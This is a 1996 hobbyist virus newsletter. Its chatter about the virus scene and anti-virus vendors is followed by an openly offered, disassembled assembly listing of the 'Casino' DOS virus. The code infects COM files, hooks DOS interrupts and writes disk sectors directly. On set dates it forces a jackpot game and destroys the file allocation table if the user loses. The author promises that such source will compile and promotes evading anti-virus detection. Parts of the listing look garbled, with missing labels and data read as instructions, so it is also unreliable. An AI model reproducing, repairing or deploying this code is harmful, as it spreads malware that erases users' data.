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The Kollywabbles' Virus Newsletter. NOW INCLUDES

NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.

The Kollywabbles' Virus Newsletter

Number 3, Volume 1 January 17th, 1996


Yes folks, now there is an easier way to get the viruses that you need, and
all you have to do is pick up your phone (sortof)! Well, the BBS isn't open
to the general public, but you can e-mail me on the BBS you got this
newsletter from, and tell me how badly you want access. I'll consider giving
you the number. (I'm real cheap, and don't have a phone line for it, so I
am kinda uncomfortable giving out my number to strangers, but then, you
could always send me money for the line!).


Well, I just realized there was a flaw in my little freedom of info notion,
and well, I'm gonna start giving out source code. Included with this news-
letter will be a virus. The virus source that I include will be of a virus
that is pretty well known, or is know by the "a/v community". All source
will be 100% guarunteed to compile, unless you are a lamer that can't figure
out TASM.


It has come to my attention that there is a LARGE number of anti-heuristic
viruses out there, and the general ease of ability for virus writers such
as myself to write a virus that an a/v program can't find at all. It seems
that a/v programs are kinda falling behind in virus technology. Us writers
are seemingly faced with little obstacles to get around, and a/v programs
are only a nuisance. The a/v community is mostly making it's money off of
scare tactics and over-glorifying their products. What they need to do, and
have always needed to do, is figure out some other way to detect viruses.
That's all I have to say about that. Would you like a chocolate?


The Australian virus scene is getting rather large. The rise of groups such
as VLAD, etc. is starting to put Australia on the "virus map". Although
I don't agree with some of the things that the Australian writers have to
say about the US, they are coming up with a lot of innovative ideas that the
US is not. Another Bulgaria? Who knows. Just as long as the Aussies keep
on looking for a Win95 virus, they are all right with me. Good luck


That reminds me, Windows 95 is becoming REAL popular with the lamers.
They think it is the greatest thing ever to hit the computer world. Me
personally, I think it is just another step for IBMs becoming more like
Macintoshes. It makes me sick to think if all of the control I'd lose over
my computer if I installed Win95. But, well, there will always be DOS,
even if it is highly modified by Windows 95.


Here it is folks, a once popular virus (and an amusing one at that). This
virus is ancient, but is extremely creative. It will activate on three
dates: Jan 15th, Apr 15th, and Aug 15th. When it does, it will make the
user play a "casino" type game, and if the user loses, he loses his FAT.
--------------------------------CUT HERE--------------------------------------

PAGE 59,132

data_1e equ 60Ch ; (0000:060C=0)
data_2e equ 60Dh ; (0000:060D=0)
data_3e equ 60Eh ; (0000:060E=0)
data_4e equ 60Fh ; (0000:060F=0)
data_5e equ 610h ; (0000:0610=0)
data_6e equ 611h ; (0000:0611=0)
data_7e equ 612h ; (0000:0612=0)
data_8e equ 2 ; (6AE6:0002=0)
data_10e equ 3Bh ; (6AE6:003B=0)
data_11e equ 3Dh ; (6AE6:003D=0)
data_12e equ 3Fh ; (6AE6:003F=0)
data_13e equ 40h ; (6AE6:0040=0)
data_14e equ 41h ; (6AE6:0041=0)
data_15e equ 43h ; (6AE6:0043=6AE6h)
data_16e equ 45h ; (6AE6:0045=0)
data_17e equ 47h ; (6AE6:0047=6AE6h)
data_18e equ 4Dh ; (6AE6:004D=0)
data_19e equ 68h ; (6AE6:0068=0)
data_20e equ 7Eh ; (6AE6:007E=0)
data_21e equ 80h ; (6AE6:0080=0)
data_33e equ 716Eh ; (6AE6:716E=0)

seg_a segment byte public
assume cs:seg_a, ds:seg_a

org 100h

casino proc far

data_23 db 0E9h
data_24 db 48h
data_25 db 7, 'ello - Copyright S & S Intern'
db 'ational, 1990', 0Ah, 0Dh, '$'
db 1Ah
db 'AA'
db 0E6h

casino endp

; External Entry Point

int_24h_entry proc far
inc cx
inc cx
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inc cx ;The CX register is getting REAL tired
inc cx ;by now. (kollywabbles)
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inc cx
inc cx
inc cx
mov ah,9
mov dx,offset data_25 ; (6AE6:0103=7)
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; Program Terminate
db 0, 0, 0, 0, 0, 0Fh
db 0, 0, 0E9h, 0D3h, 1, 0E9h
db 0, 0, 0, 90h, 0E9h, 78h
db 2Ah, 2Ah, 2Eh, 43h, 4Fh, 4Dh
db 0
db 0, 43h, 4Fh, 4Dh, 4Dh, 41h
db 4Eh, 44h, 0FFh
db 2Eh, 43h, 4Fh, 4Dh
db 15 dup (0)
db 3Fh, 0, 0F0h, 3, 2, 0
db 0B3h, 4Bh, 0FCh, 91h, 56h, 5
db 79h, 10h, 0, 0, 0, 0
db 0, 3
db 8 dup (3Fh)
db 43h, 4Fh, 4Dh, 3Fh, 8, 0
db 1Eh, 2, 2Eh, 8Bh, 26h, 68h
db 20h, 0A9h, 8Eh, 1Fh, 15h, 0E8h
db 3, 0, 0
db 'H1000.COM'
db 9 dup (0)
db 1Fh, 15h, 0A9h, 8Eh, 90h, 90h
db 3Dh, 59h, 4Bh, 75h, 4, 0B8h
db 66h, 6, 0CFh, 80h, 0FCh, 11h
db 74h, 8, 80h, 0FCh, 12h, 74h
db 3, 0EBh, 51h, 90h
cmp al,66h ; 'f'
je loc_4 ; Jump if equal
mov al,66h ; 'f'
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
push ax
push bx
push cx
push dx
push es
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov al,es:[bx+10h]
cmp al,43h ; 'C'
jne loc_3 ; Jump if not equal
mov al,es:[bx+11h]
cmp al,4Fh ; 'O'
jne loc_3 ; Jump if not equal
mov al,es:[bx+12h]
cmp al,4Dh ; 'M'
jne loc_3 ; Jump if not equal
mov ax,es:[bx+24h]
cmp ax,91Ah
jb loc_3 ; Jump if below
sub ax,91Ah
mov cx,ax
push cx
mov cx,10h
mov dx,0
div cx ; ax,dx rem=dx:ax/reg
pop cx
cmp dx,0
jne loc_3 ; Jump if not equal
mov es:[bx+24h],cx
pop es
pop dx
pop cx
pop bx
pop ax
iret ; Interrupt return
int_24h_entry endp

push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov bx,cs
mov ds,bx
mov al,0
mov ds:data_18e,al ; (6AE6:004D=0)
mov al,ds:data_13e ; (6AE6:0040=0)
cmp al,0FFh
jne loc_5 ; Jump if not equal
jmp loc_15 ; (06B2)
mov al,0FFh
mov ds:data_13e,al ; (6AE6:0040=0)
cmp ah,4Bh ; 'K'
je loc_6 ; Jump if equal
cmp ah,36h ; '6'
je loc_7 ; Jump if equal
jmp loc_15 ; (06B2)
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov ds:data_12e,al ; (6AE6:003F=0)
jmp short loc_8 ; (0624)
db 90h
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov ds:data_12e,al ; (6AE6:003F=0)
cmp dl,0
je loc_8 ; Jump if equal
dec dl
mov ah,0Eh
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
cmp al,1
ja loc_9 ; Jump if above
mov ch,0
push ds
pop es
mov bx,917h
mov al,1
call sub_3 ; (07DB)
mov al,1
call sub_4 ; (07EC)
cmp ah,0
je loc_9 ; Jump if equal
jmp short loc_14 ; (069C)
db 90h
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov ds:data_14e,bx ; (6AE6:0041=0)
mov ds:data_15e,es ; (6AE6:0043=6AE6h)
mov dx,4Eh
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov dx,0Bh
mov cx,3Fh
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_14 ; Jump if carry Set
mov dx,6Ch
call sub_1 ; (06EE)
cmp dl,1
jne loc_10 ; Jump if not equal
call sub_2 ; (073C)
jmp short loc_14 ; (069C)
db 90h
cmp dl,3
je loc_11 ; Jump if equal
jmp short loc_14 ; (069C)
db 90h
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_12 ; Jump if carry=0
jmp short loc_14 ; (069C)
db 90h
mov dx,6Ch
call sub_1 ; (06EE)
cmp dl,1
jne loc_13 ; Jump if not equal
call sub_2 ; (073C)
jmp short loc_14 ; (069C)
db 90h
cmp dl,3
je loc_11 ; Jump if equal
mov dl,ds:data_12e ; (6AE6:003F=0)
mov ah,0Eh
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov dx,ds:data_14e ; (6AE6:0041=0)
mov bx,ds:data_15e ; (6AE6:0043=6AE6h)
mov ds,bx
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov ah,0
mov ds:data_13e,ah ; (6AE6:0040=0)
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
;* jmp far ptr loc_1 ;*(0273:1460)
db 0EAh, 60h, 14h, 73h, 2
db 8Ch, 0CAh, 83h, 0C2h, 10h, 8Eh
db 0DAh, 0BAh, 20h, 0, 0B4h, 41h
db 0CDh, 21h, 0B8h, 21h, 35h, 0CDh
db 21h, 8Ch, 6, 0D4h, 1, 89h
db 1Eh, 0D2h, 1, 0BAh, 82h, 0
db 0B8h, 21h, 25h, 0CDh, 21h, 0BAh
db 1Bh, 0Ch, 0CDh
db 27h


sub_1 proc near
mov ax,ds:data_19e ; (6AE6:0068=0)
cmp ax,0F5B9h
ja loc_20 ; Jump if above
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
test cl,4
jnz loc_20 ; Jump if not zero
test cl,1
jz loc_16 ; Jump if zero
and cl,0FEh
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov dx,3
mov cx,1
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
jnc loc_17 ; Jump if carry=0
jmp short loc_19 ; (0732)
db 90h
cmp ax,0
jne loc_18 ; Jump if not equal
jmp short loc_19 ; (0732)
db 90h
mov al,byte ptr ds:data_8e+1 ; (6AE6:0003=0)
cmp al,90h
jne loc_21 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
mov dl,3
mov dl,1
sub_1 endp


sub_2 proc near
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ds:data_20e,dx ; (6AE6:007E=0)
mov ds:data_21e,cx ; (6AE6:0080=0)
push bx
call sub_5 ; (07FD)
mov bx,68h
mov ax,[bx]
mov dx,0
mov bx,10h
div bx ; ax,dx rem=dx:ax/reg
inc ax
mov ds:data_10e,ax ; (6AE6:003B=0)
mul bx ; dx:ax = reg * ax
mov ds:data_11e,ax ; (6AE6:003D=0)
pop bx
mov cx,ds:data_10e ; (6AE6:003B=0)
mov si,35Fh
mov [si],cx
mov cx,0
mov dx,0
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,605h
mov cx,4
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov cx,0
mov dx,ds:data_11e ; (6AE6:003D=0)
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,0
mov cx,91Ah
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
cmp ax,cx
jb loc_22 ; Jump if below
mov al,ds:data_18e ; (6AE6:004D=0)
cmp al,1
je loc_22 ; Jump if equal
mov cx,0
mov dx,0
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov si,9
mov ax,ds:data_11e ; (6AE6:003D=0)
add ax,35Ch
sub ax,4
mov [si],ax
mov dx,7
mov cx,4
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov dx,ds:data_20e ; (6AE6:007E=0)
mov cx,ds:data_21e ; (6AE6:0080=0)
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
call sub_6 ; (0813)
sub_2 endp


sub_3 proc near
push ax
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov dl,al
pop ax
mov dh,0
mov cl,1
mov ah,2
int 13h ; Disk dl=drive #: ah=func b2h
; read sectors to memory es:bx
sub_3 endp


sub_4 proc near
push ax
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov dl,al
pop ax
mov dh,0
mov cl,1
mov ah,3
int 13h ; Disk dl=drive #: ah=func b3h
; write sectors from mem es:bx
sub_4 endp


sub_5 proc near
mov ax,3524h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ds:data_16e,bx ; (6AE6:0045=0)
mov ds:data_17e,es ; (6AE6:0047=6AE6h)
mov dx,335h
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
sub_5 endp


sub_6 proc near
mov dx,ds:data_16e ; (6AE6:0045=0)
mov cx,ds:data_17e ; (6AE6:0047=6AE6h)
push ds
push cx
pop ds
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
pop ds
sub_6 endp

db 50h, 53h, 51h, 52h, 1Eh, 6
db 0B4h, 0, 0CDh, 13h, 0B4h, 1
db 88h, 26h, 4Dh, 0, 0BFh, 0FFh
db 0FFh, 8Eh, 6, 49h, 0, 8Bh
db 1Eh, 4Bh, 0, 0B0h, 0, 26h
db 88h, 7, 7, 1Fh, 5Ah, 59h
db 5Bh, 58h, 0CFh, 8Ch, 0CAh, 0B9h
db 3Fh, 0, 3, 0D1h, 83h, 0C2h
db 10h, 8Eh, 0DAh, 0A1h, 3Dh, 0
db 5, 3, 6, 0BBh, 0FEh, 0FFh
db 2Bh, 0D8h, 89h, 1Eh, 3, 6
db 0BBh, 5, 6, 8Ah, 7, 2Eh
db 0A2h, 0, 1, 43h, 8Ah, 7
db 2Eh, 0A2h, 1, 1, 43h, 8Ah
db 7, 2Eh, 0A2h, 2, 1, 43h
db 8Ah, 7, 2Eh, 0A2h, 3, 1
db 0B4h, 2Ah, 0CDh, 21h, 80h, 0FAh
db 0Fh, 74h, 3, 0E9h, 0A2h, 1
cmp dh,1
je loc_24 ; Jump if equal
cmp dh,4
je loc_24 ; Jump if equal
cmp dh,8
je loc_24 ; Jump if equal
jmp loc_36 ; (0A33)
call sub_8 ; (09EB)
push ds
pop es
mov si,613h
mov di,613h
mov cx,305h
cld ; Clear direction

lodsb ; String [si] to al
sub al,64h ; 'd'
stosb ; Store al to es:[di]
loop locloop_25 ; Loop if cx > 0

mov dx,613h
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ah,7
int 21h ; DOS Services ah=function 07h
; get keybd char al, no echo
mov byte ptr ds:data_2e,64h ; (0000:060D=0) 'd'
mov byte ptr ds:data_3e,78h ; (0000:060E=0) 'x'
mov byte ptr ds:data_4e,0B4h ; (0000:060F=0)
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
mov bl,dh
mov bh,0
mov ch,0
mov dh,0
add cl,dl
mov ax,cx
mov cl,3
div cl ; al, ah rem = ax/reg
mov ds:data_5e,ah ; (0000:0610=0)
mov ax,dx
mov dl,3
div dl ; al, ah rem = ax/reg
mov ds:data_6e,ah ; (0000:0611=0)
mov ax,bx
div dl ; al, ah rem = ax/reg
mov ds:data_7e,ah ; (0000:0612=0)
dec byte ptr ds:data_1e ; (0000:060C=0)
mov al,ds:data_1e ; (0000:060C=0)
add al,30h ; '0'
mov dh,0Dh
mov dl,26h ; '&'
mov bx,0
mov ah,2
int 10h ; Video display ah=functn 02h
; set cursor location in dx
mov ah,0Eh
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
mov dx,1FFFh
dec dx
jnz loc_28 ; Jump if not zero
mov al,ds:data_2e ; (0000:060D=0)
cmp al,ds:data_5e ; (0000:0610=0)
je loc_29 ; Jump if equal
mov dl,19h
mov al,ds:data_2e ; (0000:060D=0)
call sub_7 ; (09C9)
mov al,ds:data_2e ; (0000:060D=0)
dec al
mov ds:data_2e,al ; (0000:060D=0)
mov al,ds:data_3e ; (0000:060E=0)
cmp al,ds:data_6e ; (0000:0611=0)
je loc_30 ; Jump if equal
mov dl,21h ; '!'
mov al,ds:data_3e ; (0000:060E=0)
call sub_7 ; (09C9)
dec byte ptr ds:data_3e ; (0000:060E=0)
mov al,ds:data_4e ; (0000:060F=0)
cmp al,ds:data_7e ; (0000:0612=0)
je loc_31 ; Jump if equal
mov dl,29h ; ')'
mov al,ds:data_4e ; (0000:060F=0)
call sub_7 ; (09C9)
dec byte ptr ds:data_4e ; (0000:060F=0)
mov al,ds:data_4e ; (0000:060F=0)
cmp al,ds:data_7e ; (0000:0612=0)
jne loc_27 ; Jump if not equal
mov ah,ds:data_3e ; (0000:060E=0)
cmp ah,ds:data_6e ; (0000:0611=0)
jne loc_27 ; Jump if not equal
mov bl,ds:data_2e ; (0000:060D=0)
cmp bl,ds:data_5e ; (0000:0610=0)
jne loc_27 ; Jump if not equal
cmp al,0
jne loc_32 ; Jump if not equal
cmp ah,0
jne loc_32 ; Jump if not equal
cmp bl,0
jne loc_32 ; Jump if not equal
mov dx,80Ah
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
call sub_9 ; (0A18)
jmp short loc_35 ; (09C7)
db 90h
cmp al,1
jne loc_33 ; Jump if not equal
cmp ah,1
jne loc_33 ; Jump if not equal
cmp bl,1
jne loc_33 ; Jump if not equal
mov dx,88Dh
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
jmp short loc_34 ; (09BD)
db 90h
mov al,ds:data_1e ; (0000:060C=0)
cmp al,0
je loc_34 ; Jump if equal
jmp loc_26 ; (08BF)
mov dx,8D6h
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
jmp short loc_35 ; (09C7)
jmp short loc_35 ; (09C7)


sub_7 proc near
mov ah,0
push ax
mov dh,0Bh
mov ah,2
mov bh,0
int 10h ; Video display ah=functn 02h
; set cursor location in dx
pop ax
mov bl,3
div bl ; al, ah rem = ax/reg
mov bl,ah
mov bh,0
add bx,609h
mov al,[bx]
mov ah,0Eh
mov bx,0
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
sub_7 endp


sub_8 proc near
push ds
mov bx,ds
add bx,1000h
mov ds,bx
mov bx,0
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov cx,50h
mov dx,0
int 25h ; Absolute disk read, drive al
popf ; Pop flags
mov bx,0
mov ds,bx
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov cx,50h
mov dx,0
int 26h ; Absolute disk write, drive al
popf ; Pop flags
pop ds
sub_8 endp


sub_9 proc near
push ds
mov bx,ds
add bx,1000h
mov ds,bx
mov bx,0
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov cx,50h
mov dx,0
int 26h ; Absolute disk write, drive al
popf ; Pop flags
pop ds
sub_9 endp

mov bx,0
mov ax,4B59h
int 21h ; DOS Services ah=function 4Bh
; run progm @ds:dx, parm @es:bx
cmp ax,666h
jne loc_37 ; Jump if not equal
jmp loc_41 ; (0AF0)
push ds
pop es
push ds
push cs
pop ds
mov si,0
mov di,917h
mov cx,100h
cld ; Clear direction
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop ds
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov ds:data_14e,bx ; (6AE6:0041=0)
mov ds:data_15e,es ; (6AE6:0043=6AE6h)
mov dx,4Eh
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov dx,11h
mov cx,3Fh
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_38 ; Jump if carry Set
mov dx,11h
call sub_1 ; (06EE)
cmp dl,1
jne loc_38 ; Jump if not equal
call sub_2 ; (073C)
call sub_5 ; (07FD)
mov dx,20h
mov cx,2
mov ah,3Ch ; '<'
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
jc loc_40 ; Jump if carry Set
mov bx,ax
mov dx,0
mov cx,91Ah
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
push ax
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
pop ax
cmp ax,cx
je loc_39 ; Jump if equal
mov dx,20h
mov ah,41h ; 'A'
int 21h ; DOS Services ah=function 41h
; delete file, name @ ds:dx
jmp short loc_40 ; (0AD1)
db 90h
push cs
pop es
mov bx,cs:data_8e ; (6AE6:0002=0)
sub bx,92Ch
mov cx,cs
sub bx,cx
mov ah,4Ah ; 'J'
int 21h ; DOS Services ah=function 4Ah
; change mem allocation, bx=siz
mov dx,20h
push ds
pop es
mov bx,2Dh
mov ax,4B00h
int 21h ; DOS Services ah=function 4Bh
; run progm @ds:dx, parm @es:bx
call sub_6 ; (0813)
push cs
pop es
mov di,0
mov si,917h
mov cx,0FFh
cld ; Clear direction
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov dx,ds:data_14e ; (6AE6:0041=0)
mov bx,ds:data_15e ; (6AE6:0043=6AE6h)
mov ds,bx
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
push cs
pop ds
jmp $-0F32h
jmp $+3DFh
db 48h, 9Bh, 9Ch, 3Fh, 5, 0Ah
db 5, 3, 1, 3, 0, 6Eh
db 71h, 6Dh, 6Dh, 84h, 84h, 84h
db 0A8h, 0ADh, 0B7h, 0AFh, 84h, 0A8h
db 0A9h, 0B7h, 0B8h, 0B6h, 0B3h, 0BDh
db 0A9h, 0B6h, 84h, 5Dh, 84h, 0A5h
db 84h, 0B7h, 0B3h, 0B9h, 0BAh, 0A9h
db 0B2h, 0ADh, 0B6h, 84h, 0B3h, 0AAh
db 84h, 0B1h, 0A5h, 0B0h, 0B8h, 0A5h
db 6Eh, 71h, 6Eh, 71h, 6Dh, 6Dh
db 0ADh, 84h, 0CCh, 0C5h, 0DAh, 0C9h
db 84h, 0CEh, 0D9h, 0D7h, 0D8h, 84h
db 0A8h, 0A9h, 0B7h, 0B8h, 0B6h, 0B3h
db 0BDh, 0A9h, 0A8h, 84h, 0D8h, 0CCh
db 0C9h, 84h, 0AAh, 0A5h, 0B8h, 84h
db 0D3h, 0D2h, 84h, 0DDh, 0D3h, 0D9h
db 0D6h, 84h, 0A8h, 0CDh, 0D7h, 0CFh
db 84h, 85h, 85h, 6Eh, 71h, 84h
db 84h, 84h, 84h, 84h, 84h, 0ACh
db 0D3h, 0DBh, 0C9h, 0DAh, 0C9h, 0D6h
db 90h, 84h, 0ADh, 84h, 0CCh, 0C5h
db 0DAh, 0C9h, 84h, 0C5h, 84h, 0C7h
db 0D3h, 0D4h, 0DDh, 84h, 0CDh, 0D2h
db 84h, 0B6h, 0A5h, 0B1h, 90h, 84h
db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h
db 0D1h, 84h, 0CBh, 0CDh, 0DAh, 0CDh
db 0D2h, 0CBh, 84h, 0DDh, 0D3h, 0D9h
db 84h, 0C5h, 84h, 0D0h, 0C5h, 0D7h
db 0D8h, 84h, 0C7h, 0CCh, 0C5h, 0D2h
db 0C7h, 0C9h, 6Eh, 71h, 6Dh, 6Dh
db 6Dh, 0D8h, 0D3h, 84h, 0D6h, 0C9h
db 0D7h, 0D8h, 0D3h, 0D6h, 0C9h, 84h
db 0DDh, 0D3h, 0D9h, 0D6h, 84h, 0D4h
db 0D6h, 0C9h, 0C7h, 0CDh, 0D3h, 0D9h
db 0D7h, 84h, 0C8h, 0C5h, 0D8h, 0C5h
db 92h, 6Eh, 71h, 84h, 84h, 84h
db 84h, 84h, 0BBh, 0A5h, 0B6h, 0B2h
db 0ADh, 0B2h, 0ABh, 9Eh, 84h, 0ADh
db 0AAh, 84h, 0BDh, 0B3h, 0B9h, 84h
db 0B6h, 0A9h, 0B7h, 0A9h, 0B8h, 84h
db 0B2h, 0B3h, 0BBh, 90h, 84h, 0A5h
db 0B0h, 0B0h, 84h, 0BDh, 0B3h, 0B9h
db 0B6h, 84h, 0A8h, 0A5h, 0B8h, 0A5h
db 84h, 0BBh, 0ADh, 0B0h, 0B0h, 84h
db 0A6h, 0A9h, 84h, 0B0h, 0B3h, 0B7h
db 0B8h, 84h, 91h, 84h, 0AAh, 0B3h
db 0B6h, 0A9h, 0BAh, 0A9h, 0B6h, 84h
db 85h, 85h, 6Eh, 71h, 6Dh, 6Dh
db 84h, 84h, 84h, 0BDh, 0D3h, 0D9h
db 0D6h, 84h, 0A8h, 0C5h, 0D8h, 0C5h
db 84h, 0C8h, 0C9h, 0D4h, 0C9h, 0D2h
db 0C8h, 0D7h, 84h, 0D3h, 0D2h, 84h
db 0C5h, 84h, 0CBh, 0C5h, 0D1h, 0C9h
db 84h, 0D3h, 0CAh, 84h, 0AEh, 0A5h
db 0A7h, 0AFh, 0B4h, 0B3h, 0B8h, 71h
db 6Eh, 71h, 6Eh, 6Dh, 6Dh, 84h
db 84h, 84h, 84h, 84h, 84h, 0A7h
db 0A5h, 0B7h, 0ADh, 0B2h, 0B3h, 84h
db 0A8h, 0A9h, 84h, 0B1h, 0A5h, 0B0h
db 0B8h, 0A9h, 84h, 0AEh, 0A5h, 0A7h
db 0AFh, 0B4h, 0B3h, 0B8h
db 'nqnqmmm-1'
db 1Fh, 6Dh, 2Dh, 31h, 1Fh, 6Dh
db 2Dh, 31h, 1Fh, 6Eh, 71h, 6Dh
db 6Dh, 6Dh, 3Bh, 0, 3Bh, 6Dh
db 3Bh, 0A3h, 3Bh, 6Dh, 3Bh, 0FFh
db ';nqmmm,1 m,1 m,1 nqmmm'
db 84h, 84h, 84h, 84h, 0A7h, 0B6h
db 0A9h, 0A8h, 0ADh, 0B8h, 0B7h, 84h
db 9Eh, 84h, 99h
db 'nqqnqnmmm'
db 0, 0, 0, 84h, 0A1h, 84h
db 0BDh, 0D3h, 0D9h, 0D6h, 84h, 0A8h
db 0CDh, 0D7h, 0CFh, 6Eh, 71h, 6Dh
db 6Dh, 6Dh, 0A3h, 0A3h, 0A3h, 84h
db 0A1h, 84h, 0B1h, 0DDh, 84h, 0B4h
db 0CCh, 0D3h, 0D2h, 0C9h, 84h, 0B2h
db 0D3h, 92h, 6Eh, 71h, 6Eh, 71h
db 6Dh, 6Dh, 6Dh, 0A5h, 0B2h, 0BDh
db 84h, 0AFh, 0A9h, 0BDh, 84h, 0B8h
db 0B3h, 84h, 0B4h, 0B0h, 0A5h, 0BDh
db 'qnqnqnqnqn'
db 88h, 6Eh, 71h, 0A6h, 0A5h, 0B7h
db 0B8h, 0A5h, 0B6h, 0A8h, 84h, 85h
db 84h, 0BDh, 0D3h, 0D9h, 0C4h, 0D6h
db 0C9h, 84h, 0D0h, 0D9h, 0C7h, 0CFh
db 0DDh, 84h, 0D8h, 0CCh, 0CDh, 0D7h
db 84h, 0D8h, 0CDh, 0D1h, 0C9h, 84h
db 91h, 84h, 0C6h, 0D9h, 0D8h, 84h
db 0CAh, 0D3h, 0D6h, 84h, 0DDh, 0D3h
db 0D9h, 0D6h, 84h, 0D3h, 0DBh, 0D2h
db 84h, 0D7h, 0C5h, 0CFh, 0C9h, 90h
db 84h, 0D2h, 0D3h, 0DBh, 6Eh, 71h
db 0B7h, 0BBh, 0ADh, 0B8h, 0A7h, 0ACh
db 84h, 0B3h, 0AAh, 0AAh, 84h, 0BDh
db 0B3h, 0B9h, 0B6h, 84h, 0A7h, 0B3h
db 0B1h, 0B4h, 0B9h, 0B8h, 0A9h, 0B6h
db 84h, 0A5h, 0B2h, 0A8h, 84h, 0A8h
db 0B3h, 0B2h, 0C4h, 0B8h, 84h, 0B8h
db 0B9h, 0B6h
mov dl,84h
lodsw ; String [si] to ax
mov ax,0B384h
mov dl,84h
mov ax,0B0ADh
mov al,84h
mov ax,0B1B3h
mov bl,0B6h
mov dh,0B3h
mov bx,8584h
test ax,ds:data_33e[di] ; (6AE6:716E=0)
mov [bp+71h],ch
mov dl,0D3h
test ch,[bp+si-3827h]
iret ; Interrupt return
db 0CDh, 0D2h, 0C4h, 84h, 0A7h, 0CCh
db 0C5h, 0D2h, 0C7h, 0C9h, 9Fh, 84h
db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h
db 0D1h, 84h, 0D4h, 0D9h, 0D2h, 0CDh
db 0D7h, 0CCh, 0CDh, 0D2h, 0CBh, 84h
db 0DDh, 0D3h, 0D9h, 84h, 0CAh, 0D3h
db 0D6h, 84h, 0D8h, 0D6h, 0DDh, 0CDh
db 0D2h, 0CBh, 84h, 0D8h, 0D3h, 84h
db 0D8h, 0D6h, 0C5h, 0C7h, 0C9h, 84h
db 0D1h, 0C9h, 84h, 0C8h, 0D3h, 0DBh
db 0D2h, 84h, 85h, 88h, 6Eh, 71h
db 0ACh, 0A5h, 84h, 0ACh, 0A5h, 84h
db 85h, 85h, 84h, 0BDh, 0D3h, 0D9h
db 84h, 0C5h, 0D7h, 0D7h, 0CCh, 0D3h
db 0D0h, 0C9h, 90h, 84h, 0DDh, 0D3h
db 0D9h, 0C4h, 0DAh, 0C9h, 84h, 0D0h
